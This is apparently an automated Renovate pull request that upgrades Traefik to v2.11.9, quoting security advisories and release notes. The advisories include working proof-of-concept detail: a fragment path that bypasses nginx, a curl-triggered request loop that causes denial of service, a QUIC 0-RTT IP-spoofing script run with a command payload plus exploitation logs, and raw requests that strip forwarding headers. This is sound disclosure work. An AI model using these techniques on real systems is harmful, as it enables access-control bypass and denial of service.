Update module github.com/traefik/traefik/v2 to v2.11.9 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
github.com/traefik/traefik/v2	v2.9.8 -> v2.11.9

GitHub Vulnerability Alerts

CVE-2023-29013

Impact

There is a vulnerability in Go when parsing the HTTP headers, which impacts Traefik.
HTTP header parsing could allocate substantially more memory than required to hold the parsed headers. This behavior could be exploited to cause a denial of service.

References

• CVE-2023-24534

Patches

• https://github.com/traefik/traefik/releases/tag/v2.9.10
• https://github.com/traefik/traefik/releases/tag/v2.10.0-rc2

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2023-47106

Summary

When a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates the RFC because in the origin-form the URL should only contain the absolute path and the query.

When this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control
restrictions.

Details

For example, we have this Nginx configuration:

location /admin {
     deny all;
     return 403;
}

This can be bypassed when the attacker is requesting to /#/../admin

This won’t be vulnerable if the backend server follows the RFC and ignores any characters after the fragment.

However, if Nginx is chained with another reverse proxy which automatically URL encode the character # (Traefik) the URL will become

/%23/../admin

And allow the attacker to completely bypass the Access Restriction from the Nginx Front-End proxy.

Here is a diagram to summarize the attack:

PoC

This is the POC docker I've set up. It contains Nginx, Traefik proxies and a backend server running PHP.

https://drive.google.com/file/d/1vLnA0g7N7ZKhLNmHmuJ4JJjV_J2akNMt/view?usp=sharing

Impact

This allows the attacker to completely bypass the Access Restriction from Front-End proxy.

CVE-2023-47124

Impact

There is a potential vulnerability in Traefik managing the ACME HTTP challenge.

When Traefik is configured to use the HTTPChallenge to generate and renew the Let's Encrypt TLS certificates, the delay authorized to solve the challenge (50 seconds) can be exploited by attackers (slowloris attack).

Patches

• https://github.com/traefik/traefik/releases/tag/v2.10.6
• https://github.com/traefik/traefik/releases/tag/v3.0.0-beta5

Workarounds

Replace the HTTPChallenge with the TLSChallenge or the DNSChallenge.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2023-47633

Summary

The traefik docker container uses 100% CPU when it serves as its own backend, which is an automatically generated route resulting from the Docker integration in the default configuration.

Details

While attempting to set up Traefik to handle traffic for Docker containers, I observed in the webUI a rule with the following information:

Host(traefik-service) | webwebsecure | traefik-service@docker | traefik-service

I assumed that this is something internal; however, I wondered why it would have a host rule on the web entrypoint configured.

So I have send a request with that hostname with curl -v --resolve "traefik-service:80:xxx.xxx.xxx.xxx" http://traefik-service. That made my whole server unresponsive.

I assume the name comes from a docker container with that name, traefik itself:

localhost ~ # docker ps
CONTAINER ID   IMAGE                                                   COMMAND                  CREATED             STATUS         PORTS                                                                                                NAMES
d1414e74aec7   traefik:v2.10                                           "/entrypoint.sh trae…"   4 minutes ago       Up 4 minutes   0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp, 127.0.0.1:8080->8080/tcp   traefik.service

PoC

1. Start traefik with docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -p 80:80 --name foo -p 8080:8080 traefik:v2.10 --api.insecure=true --providers.docker

2. curl -v --resolve "foo:80:127.0.0.1" http://foo

looks like this creates an endless loop of request.

Knowing the name of the docker container seems to be enough to trigger this, if the docker backend is used.

Impact

Server is unreachable and uses 100% CPU

CVE-2024-28869

There is a potential vulnerability in Traefik managing requests with Content-length and no body .

Sending a GET request to any Traefik endpoint with the Content-length request header results in an indefinite hang with the default configuration. This vulnerability can be exploited by attackers to induce a denial of service.

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.2
• https://github.com/traefik/traefik/releases/tag/v3.0.0-rc5

Workarounds

For affected versions, this vulnerability can be mitigated by configuring the readTimeout option.

For more information

If you have any questions or comments about this advisory, please open an issue.

GHSA-7f4j-64p6-5h5v

There is a potential vulnerability in Traefik managing HTTP/2 connections.

More details in the CVE-2023-45288.

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.2
• https://github.com/traefik/traefik/releases/tag/v3.0.0-rc5

Workarounds

No workaround

For more information

If you have any questions or comments about this advisory, please open an issue.

GHSA-f7cq-5v43-8pwp

Impact

There is a vulnerability in GO managing malformed DNS message, which impacts Traefik.
This vulnerability could be exploited to cause a denial of service.

References

• CVE-2024-24788

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.3
• https://github.com/traefik/traefik/releases/tag/v3.0.1

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

GHSA-7jmw-8259-q9jx

Impact

There is a vulnerability in Go managing various Is methods (IsPrivate, IsLoopback, etc) for IPv4-mapped IPv6 addresses.

They didn't work as expected returning false for addresses which would return true in their traditional IPv4 forms.

References

• CVE-2024-24790

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.4
• https://github.com/traefik/traefik/releases/tag/v3.0.2

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

GHSA-rvj4-q8q5-8grf

Impact

There is a vulnerability in Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability.

References

• CVE-2024-35255

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.5
• https://github.com/traefik/traefik/releases/tag/v3.0.3

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2024-39321

Impact

There is a vulnerability in Traefik that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.6
• https://github.com/traefik/traefik/releases/tag/v3.0.4
• https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description

Summary

Bypassing IP allow-lists in traefik via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.

Details

HTTP/3 supports sending HTTP requests as early data during QUIC 0-RTT handshakes to reduce RTT overhead for connection resumptions. Early data is sent and received before the handshake is completed and the client's IP address is validated.
The initial packet containing the QUIC 0-RTT handshake information and the early data HTTP request are sent as a single UDP datagram. Due to UDP being used by QUIC, the source IP address can be spoofed. When HTTP/3 servers process early data requests, the application layer only sees the unvalidated - possibly spoofed - IP address.

First, attackers have to obtain a session ticket from the HTTP/3 server. For that, attackers have to establish an HTTP/3 connection to the server - using their real IP address - and wait for the server to send a session ticket. Note that attackers do not have to send an actual HTTP request over the established connection. After obtaining the session ticket, the attacker can close the connection. In the second step, attackers need to prepare a UDP datagram containing a QUIC initial packet with a TLS ClientHello and the session ticket, a QUIC 0-RTT packet with early data encrypted with the pre-shared key from the session ticket, and an HTTP/3 request (open request stream, HEADERS frame, optionally DATA frame). This prepared UDP datagram can then be sent to the server with an arbitrarily spoofed source IP address in the IP packet header. When processing the HTTP request, the server trusts the spoofed IP address, which can be used to bypass IP-allow/block-lists.

A prerequisite for this attack to succeed is that HTTP/3 servers have implemented and enabled 0-RTT early data for HTTP/3 requests (and no mitigations are in place). A caveat is that attackers are not able to receive the server's response because the response is sent to the spoofed source IP address, making it a blind attack. Another limitation is that the request has to fit in a single UDP datagram, whose size is limited by the network path's MTU (minus some bytes for headers of encapsulating protocols such as HTTP/3, QUIC, UDP, IPv4/IPv6).

Impact

IP allow-lists can be bypassed. Early data in QUIC 0-RTT handshakes is enabled when HTTP/3 support is enabled.

Mitigation

• Consider responding with HTTP status code 425 Too Early when 0-RTT early data requests match ipAllowList.sourceRange middleware. See RFC 8470 Section 3 for more information.
• Alternatively, delay processing of 0-RTT early data requests until the handshake is completed and the client's IP address is validated when 0-RTT early data requests match ipAllowList.sourceRange middleware.

Additionally, it is recommended to implement RFC 8470 and set the Early-Data: 1 header when forwarding early data requests to backend services. Currently, applications are not able to distinguish between 0-RTT early data requests and regular requests. When applications use the client's IP in X-Forwarded-For headers (e.g. for rate limiting), they are not able to detect potential IP spoofing on the application layer.

Proof of Concept

Traefik is used as a HTTP/3 reverse proxy for a backend application. An IP allow list is configured to only allow access from the IP address 1.3.3.7.

# /etc/traefik/traefik.yml
entryPoints:
  websecure:
    address: ":4439"
    http3: {}
    asDefault: true

providers:
  file:
    filename: /etc/traefik/provider.yml

log:
  level: DEBUG

# /etc/traefik/provider.yml
http:
  routers:
    default:
      rule: "PathPrefix(`/`)"
      tls: {}
      middlewares:
        - ipfilter
      service: backend
  
  middlewares:
    ipfilter:
      ipAllowList:
        sourceRange:
          - "1.3.3.7/32"

  services:
    backend:
      loadBalancer:
        servers:
          - url: "http://127.0.0.1:8000"

By performing the steps described above, attackers are able to bypass the IP allow list and send requests to the backend application. The security impact depends on the application's logic.

Please find attached a proof-of-concept docker-compose setup to demonstrate the vulnerability. It consists of a traefik reverse proxy, a backend application, and an attacker container. The attack script performs following request:

python3 http3_ip_spoofing.py https://127.0.0.1:4439/cmd -X POST -d "cmd=echo%20worked>>/tmp/spoofed" -H "X-Header: test" --spoofed-ip=1.3.3.7

Note: We use a custom python script because, curl does not support QUIC 0-RTT requests and session resumtion yet.

proof-of-concept.zip

Here are logs of a successful exploitation in the attached docker compose setup:

docker compose up

# Traefik startup logs
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:100 > Traefik version 3.0.3 built on 2024-06-18T14:31:20Z version=3.0.3
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/cmd/traefik/traefik.go:107 > Static configuration loaded [json] staticConfiguration={"entryPoints":{"websecure":{"address":":4439","asDefault":true,"forwardedHeaders":{},"http":{},"http2":{"maxConcurrentStreams":250},"http3":{},"transport":{"lifeCycle":{"graceTimeOut":"10s"},"respondingTimeouts":{"idleTimeout":"3m0s","readTimeout":"1m0s"}},"udp":{"timeout":"3s"}}},"global":{"checkNewVersion":true},"log":{"format":"common","level":"DEBUG"},"providers":{"file":{"filename":"/etc/traefik/provider.yml","watch":true},"providersThrottleDuration":"2s"},"serversTransport":{"maxIdleConnsPerHost":200},"tcpServersTransport":{"dialKeepAlive":"15s","dialTimeout":"30s"}}
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:605 > 
h3_traefik-1         | Stats collection is disabled.
h3_traefik-1         | Help us improve Traefik by turning this feature on :)
h3_traefik-1         | More details on: https://doc.traefik.io/traefik/contributing/data-collection/
h3_traefik-1         | 
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:73 > Starting provider aggregator aggregator.ProviderAggregator
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/server_entrypoint_tcp.go:220 > Starting TCP Server entryPointName=websecure
h3_traefik-1         | 2024-06-29T11:52:58Z DBG log/log.go:245 > 2024/06/29 11:52:58 sys_conn.go:36: failed to sufficiently increase receive buffer size (was: 208 kiB, wanted: 2048 kiB, got: 416 kiB). See https://github.com/quic-go/quic-go/wiki/UDP-Buffer-Sizes for details.
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *file.Provider
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *file.Provider provider configuration config={"filename":"/etc/traefik/provider.yml","watch":true}
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik/provider.yml
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *traefik.Provider
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *traefik.Provider provider configuration config={}
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *acme.ChallengeTLSALPN
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *acme.ChallengeTLSALPN provider configuration config={}
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"middlewares":{"ipfilter":{"ipAllowList":{"sourceRange":["1.3.3.7/32"]}}},"routers":{"default":{"middlewares":["ipfilter"],"rule":"PathPrefix(`/`)","service":"backend","tls":{}}},"services":{"backend":{"loadBalancer":{"passHostHeader":true,"responseForwarding":{"flushInterval":"100ms"},"servers":[{"url":"http://127.0.0.1:8000"}]}}}},"tcp":{},"tls":{},"udp":{}} providerName=file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"serversTransports":{"default":{"maxIdleConnsPerHost":200}},"services":{"noop":{}}},"tcp":{"serversTransports":{"default":{"dialKeepAlive":"15s","dialTimeout":"30s"}}},"tls":{},"udp":{}} providerName=internal
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/aggregator.go:51 > No entryPoint defined for this router, using the default one(s) instead entryPointName=["websecure"] routerName=default
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:321 > No default certificate, fallback to the internal generated certificate tlsStoreName=default
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:259 > Creating load-balancer entryPointName=websecure routerName=default@file serviceName=backend@file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:301 > Creating server entryPointName=websecure routerName=default@file serverName=754e0da3b063885a serviceName=backend@file target=http://127.0.0.1:8000
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:33 > Creating middleware entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:57 > Setting up IPAllowLister with sourceRange: [1.3.3.7/32] entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/observability/middleware.go:33 > Adding tracing to middleware entryPointName=websecure middlewareName=ipfilter@file routerName=default@file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/recovery/recovery.go:22 > Creating middleware entryPointName=websecure middlewareName=traefik-internal-recovery middlewareType=Recover

# Attack script establishes an HTTP/3 connection to traefik to obtain a session ticket
attack-ipspoofing-1  | INFO:client:Initially connecting to server to get a session ticket
attack-ipspoofing-1  | INFO:quic:[e29b2e2fd9a76162] ALPN negotiated protocol h3
attack-ipspoofing-1  | INFO:quic:[e29b2e2fd9a76162] Connection close sent (code 0x0, reason )
attack-ipspoofing-1  | INFO:client:Initial connection done

# Traefik accepts the HTTP/3 connection and issues as session ticket 
h3_traefik-1         | 2024-06-29T11:53:03Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:228 > Serving default certificate for request: ""

# Attack script sends a 0-RTT early data request in a UDP datagram with a spoofed source IP
attack-ipspoofing-1  | INFO:client:Building 0-RTT QUIC packet
attack-ipspoofing-1  | INFO:client:Setting up iptables rule for source IP spoofing
attack-ipspoofing-1  | INFO:client:Sending 0-RTT packet

# Traefik accepts and forwards the request to the backend service, bypassing the IP allow list
h3_traefik-1         | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:85 > Accepting IP 1.3.3.7 middlewareName=ipfilter@file middlewareType=IPAllowLister
h3_traefik-1         | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/server/service/loadbalancer/wrr/wrr.go:196 > Service selected by WRR: 754e0da3b063885a

# Backend service receives and processes the request
backend-1            | INFO:root:Request: {"ip": "1.3.3.7", "method": "POST", "path": "/cmd", "data": "cmd=echo%20worked>>/tmp/spoofed", "headers": {"Host": "127.0.0.1:4439", "Content-Length": "31", "Content-Type": "application/x-www-form-urlencoded", "X-Forwarded-For": "1.3.3.7", "X-Forwarded-Host": "127.0.0.1:4439", "X-Forwarded-Port": "4439", "X-Forwarded-Proto": "https", "X-Forwarded-Server": "work", "X-Header": "test", "X-Real-Ip": "1.3.3.7", "Accept-Encoding": "gzip"}}
backend-1            | INFO:root:Executing command: echo worked>>/tmp/spoofed

CVE-2024-45410

Impact

There is a vulnerability in Traefik that allows the client to remove the X-Forwarded headers (except the header X-Forwarded-For).

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.9
• https://github.com/traefik/traefik/releases/tag/v3.1.3

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description

Summary

When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified.

For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. By setting the following connection header, the X-Forwarded-Host header can, for example, be removed:

Connection: close, X-Forwarded-Host

Depending on how the receiving application handles such cases, security implications may arise. Moreover, some application frameworks (e.g. Django) first transform the "-" to "_" signs, making it possible for the HTTP client to even modify these headers in these cases.

This is similar to CVE-2022-31813 for Apache HTTP Server.

Details

It was found that the following headers can be removed in this way (i.e. by specifing them within a connection header):

• X-Forwarded-Host
• X-Forwarded-Port
• X-Forwarded-Proto
• X-Forwarded-Server
• X-Real-Ip
• X-Forwarded-Tls-Client-Cert
• X-Forwarded-Tls-Client-Cert-Info

PoC

The following docker-compose file has been used for a simple setup:

services:
  traefik:
    image: traefik:v3.1
    container_name: traefik
    ports:
      - "443:443"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock:ro
      - ./traefik.yaml:/etc/traefik/traefik.yaml
      - ./traefik-certs:/certs

  python-http:
    build:
      context: .
      dockerfile: Dockerfile
    container_name: python-http
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.python-http.rule=Host(`python.example.com`)"
      - "traefik.http.routers.python-http.entrypoints=websecure"
      - "traefik.http.routers.python-http.tls=true"
      - "traefik.http.services.python-http.loadbalancer.server.port=8080"

The following traefik.yaml has been used:

providers:
  docker:
    exposedByDefault: false
    watch: true
  file:
    fileName: /etc/traefik/traefik.yaml
    watch: true

entryPoints:
  websecure:
    address: ":443"

tls:
  certificates:
    - certFile: /certs/server-cert.pem
      keyFile: /certs/server-key.pem

The Python container just includes a simple Python HTTP server that prints the HTTP headers it receives. Here is the Dockerfile for the container:

FROM python:3-alpine

# Copy the Python script to the container
COPY server.py /server.py

# Set the working directory
WORKDIR /

# Command to run the Python server
CMD ["python", "/server.py"]

And here is the Python script:

from http.server import BaseHTTPRequestHandler, HTTPServer

class RequestHandler(BaseHTTPRequestHandler):
    def _send_response(self):
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.end_headers()
        self.wfile.write(str(self.headers).encode("utf-8"))

    def do_GET(self):
        self._send_response()

if __name__ == "__main__":
    server = HTTPServer(('0.0.0.0', 8080), RequestHandler)
    print("Server started on port 8080")
    server.serve_forever()

The environment is run with sudo docker-compose up.

A normal HTTP request/response pair looks like this:

Request 1

GET / HTTP/1.1
Host: python.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=0, i
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 Sep 2024 06:53:49 GMT
Server: BaseHTTP/0.6 Python/3.12.5
Connection: close
Content-Length: 556

Host: python.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=0, i
X-Forwarded-For: 172.20.0.1
X-Forwarded-Host: python.example.com
X-Forwarded-Port: 443
X-Forwarded-Proto: https
X-Forwarded-Server: 3138fe4f0a2e
X-Real-Ip: 172.20.0.1

The custom headers added by Traefik can be seen in the response.

Next, a request, where the X-Forwarded-Host header is defined as a hop-by-hop header via the Connection header is sent:

Request 2

GET / HTTP/1.1
Host: python.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=0, i
Connection: close, X-Forwarded-Host

Response 2

Host: python.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=0, i
X-Forwarded-For: 172.20.0.1
X-Forwarded-Port: 443
X-Forwarded-Proto: https
X-Forwarded-Server: 3138fe4f0a2e
X-Real-Ip: 172.20.0.1

As can be seen from the response, the X-Forwarded-Host header that had been added by Traefik has been removed from the request.

Moreover, the next request/response pair demonstrates that a custom header with underscore instead of hyphen can be added:

Request 3

GET / HTTP/1.1
Host: python.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=0, i
X_Forwarded_Host: myhost
Connection: close, X-Forwarded-Host

Response 3

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 Sep 2024 06:54:48 GMT
Server: BaseHTTP/0.6 Python/3.12.5
Connection: close
Content-Length: 544

Host: python.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=0, i
X-Forwarded-For: 172.20.0.1
X-Forwarded-Port: 443
X-Forwarded-Proto: https
X-Forwarded-Server: 3138fe4f0a2e
X-Real-Ip: 172.20.0.1
X_forwarded_host: myhost

Some backend frameworks (e.g. Django) handle X-Forwarded-Host and X_forwarded_host in the same way. As there is no X-Forwarded-Host header present in the request, the X_forwarded_host header will be used.

It should be noted that when X-Forwarded-Host is present and a X_forwarded_host header is sent, usually the first occurence of the header will be used, which is in this case X-Forwarded-Host.

It should be noted that the headers X-Forwarded-Tls-Client-Cert and X-Forwarded-Tls-Client-Cert-Info are also affected. Here, client certificate authentication would need to be enabled in the Traefik setup.

Impact

All applications that trust the custom headers set by Traefik are affected by this vulnerability. As an example, assume that a backend application trusts Traefik to validate client certificates and trusts therefore the values that are sent within the X-Forwarded-Tls-Client-Cert header, but does not validate the certificate anew.

If the header is removed via the vulnerability, and the application framework allows for alternative names (e.g. by transforming the headers to lower case, and "-" to "_"), an attacker can place his own X_Forwarded_TLS_Client_Cert header in the request. This could lead to privilege escalation, as the attacker may put an (invalid) certificate in this header that would just be accepted by the application, but may contain other data than the certificate that is presented to Traefik for Client Certificate Authentication.

Moreover, if the backend application uses any of the other custom headers for security-sensitive operations, the removal or modification of these headers may also security implications (e.g. access control bypass).

The severity is the same as for CVE-2022-31813 for Apache HTTP Server, i.e. 9.8 Critical.

---

Release Notes

traefik/traefik (github.com/traefik/traefik/v2)

v2.11.9

Compare Source

CVE: CVE-2024-45410 (Advisory GHSA-62c8-mh53-4cqv)

Bug fixes:

• [acme] Update go-acme/lego to v4.18.0 (#​11060 by ldez)
• [acme] Allow handling ACME challenges with custom routers (#​10981 by rtribotte)
• [logs,middleware] Make the keys of the accessLog.fields.names map case-insensitive (#​11040 by SpecLad)
• [logs,middleware] Ensure proper logs for aborted streaming responses (#​10819 by hood)
• [middleware,server] Cleanup Connection headers before passing the middleware chain (#​11077 by kevinpollet)
• [plugins] Upgrade paerser to v0.2.1 (#​11048 by mmatur)
• [server,tcp] Prevent error logging when TCP WRR pool is empty (#​10989 by kevinpollet)
• [webui] Upgrade webui dependencies (#​11031 by mloiseleur)

Documentation:

• [acme] Fix typo in multiple DNS challenge provider warning (#​11001 by tired-engineer)
• [k8s] Update k8s quickstart permissions (#​11049 by mmatur)
• [metrics] Remove documentation for unimplemented service retries metric (#​10983 by rtribotte)
• [middleware] Unify tab titles (#​11072 by jsoref)
• Give valid examples for exposing dashboard with default Helm values (#​11015 by holysoles)

v2.11.8

Compare Source

All Commits

Bug fixes:

• [docker] Update to github.com/docker/docker v27.1.1 (#​10955 by rtribotte)
• [webui] Upgrade webui dependencies (#​10961 by mmatur)

Documentation:

• Fix embedded youtube video (#​10958 by mmatur)
• Updated index.md to include video (#​10944 by tomatokoolaid)

v2.11.7

Compare Source

All Commits

Bug fixes:

• [logs] Make the log about new version more accurate (#​10903 by jmcbri)
• [tls,k8s/crd,k8s] Enforce default cipher suites list (#​10907 by rtribotte)

Documentation:

• [acme] Modify certificatesDuration documentation (#​10920 by peacewalker122)
• [api] Improve explanation on API exposition (#​10926 by mloiseleur)
• [docker,consul,rancher,ecs] Improve doc on sensitive data stored into labels/tags (#​10873 by emilevauge)
• [docker,logs] Improve error and documentation on the needed link between router and service (#​10262 by mloiseleur)
• [docker] Document Docker port selection on multiple exposed ports (#​10935 by mbrodala)
• Update the supported versions table for v3.1 release (#​10933 by jnoordsij)
• Update PR approval process (#​10887 by emilevauge)

v2.11.6

Compare Source

All Commits

Bug fixes:

• [ecs] Fix ECS config for OIDC + IRSA (#​10814 by mmatur)
• [http3] Disable QUIC 0-RTT (#​10867 by mmatur)
• [middleware,server] Remove interface names from IPv6 (#​10813 by JeroenED)

Documentation:

• [docker,acme] Fix a typo in the ACME docker-compose docs (#​10866 by ciacon)
• Update Advanced Capabilities Callout (#​10846 by tomatokoolaid)
• Update maintainers (#​10834 by emilevauge)
• Fix readme badge for Semaphore CI (#​10830 by mmatur)
• Fix typo in keepAliveMaxTime docs (#​10825 by shochdoerfer)

v2.11.5

Compare Source

All Commits

Bug fixes:

• [acme] Update go-acme/lego to v4.17.4 (#​10803 by ldez)

Documentation:

• Update the supported versions table (#​10798 by nmengin)

v2.11.4

Compare Source

All Commits

Bug fixes:

• [acme] Update go-acme/lego to v4.17.3 (#​10768 by ldez)

Documentation:

• [acme] Fix .com and .org domain examples (#​10635 by rptaylor)
• [middleware] Add a note about the Ratelimit middleware's behavior when the sourceCriterion header is missing (#​10752 by dgutzmann)
• Add user guides link to getting started (#​10785 by norlinhenrik)
• Remove helm default repo warning as repo has been long deprecated (#​10772 by corneliusroemer)

v2.11.3

Compare Source

All Commits

Bug fixes:

• [server] Remove deadlines for non-TLS connections (#​10615 by rtribotte)
• [webui] Display of Content Security Policy values getting out of screen (#​10710 by brandonfl)
• [webui] Fix provider icon size (#​10621 by framebassman)

Documentation:

• [k8s/crd] Fix migration/v2.md (#​10658 by stemar94)
• [k8s/gatewayapi] Fix HTTPRoute use of backendRefs (#​10630 by sakaru)
• [k8s/gatewayapi] Fix HTTPRoute path type (#​10629 by sakaru)
• [k8s] Improve mirroring example on Kubernetes (#​10701 by mloiseleur)
• Consistent entryPoints capitalization in CLI flag usage (#​10650 by jnoordsij)
• Fix unfinished migration sentence for v2.11.2 (#​10633 by kevinpollet)

v2.11.2

Compare Source

All Commits

Bug fixes:

• [server] Revert LingeringTimeout and change default value for ReadTimeout (#​10599 by kevinpollet)
• [server] Set default ReadTimeout value to 60s (#​10602 by rtribotte)

v2.11.1

Compare Source

All Commits

Bug fixes:

• [acme,tls] Enforce handling of ACME-TLS/1 challenges (#​10536 by rtribotte)
• [acme] Update go-acme/lego to v4.16.1 (#​10508 by ldez)
• [acme] Close created file in ACME local store CheckFile func (#​10574 by testwill)
• [docker,http3] Update to quic-go v0.42.0 and docker/cli v24.0.9 (#​10572 by mloiseleur)
